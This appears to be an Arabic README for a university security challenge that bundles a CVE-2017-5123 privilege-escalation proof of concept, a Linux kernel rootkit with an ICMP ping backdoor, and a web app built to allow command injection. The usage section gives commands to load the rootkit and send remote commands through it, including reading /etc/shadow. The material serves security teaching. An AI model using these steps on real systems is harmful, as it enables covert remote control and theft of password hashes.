
يحتوي هذا المستودع على عرض توضيحي لـ CVE-2017-5123، وهو باب خلفي للتحكم والأوامر عبر ICMP، وتطبيق ويب قابل للاستغلال بثغرة CWE-78 (حقن أوامر نظام التشغيل).
جزء من CSC 4308 - التحدي 3.
يستعرض هذا المشروع ثلاثة مكونات متميزة من مكونات البحوث الأمنية:
lkm/rootkit.c)استغلال لإثبات المفهوم لثغرة استدعاء النظام waitid التي أُدخلت في نواة لينكس 4.13. تسمح هذه الثغرة بتصعيد الامتيازات والهروب من بيئة العزل.
lkm/lkm.c)وحدة نواة لينكس خبيثة (LKM) تنفّذ قناة تحكم وأوامر خفية عبر حزم ICMP echo (ping).
25678vulnerable-app/)تطبيق لمشاركة الملفات مبني على React + Node.js قابل للاستغلال بحقن أوامر نظام التشغيل.
pinger/data-ping.c)أداة لإرسال طلبات ICMP echo مخصصة بحمولات مخصصة للتواصل مع الباب الخلفي لروتكيت النواة.
cd lkm
make
sudo insmod lkm.ko
cd ../pinger
gcc -o data-ping data-ping.c
# Must run as root to use raw sockets
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"
sudo rmmod lkm
make reload
# Build the frontend
cd vulnerable-app/frontend
npm run build
# Copy build to backend
cp -r build ../backend/
# Start the backend server (serves both API and frontend)
cd ../backend
npm start
سيكون التطبيق متاحًا على http://localhost:3001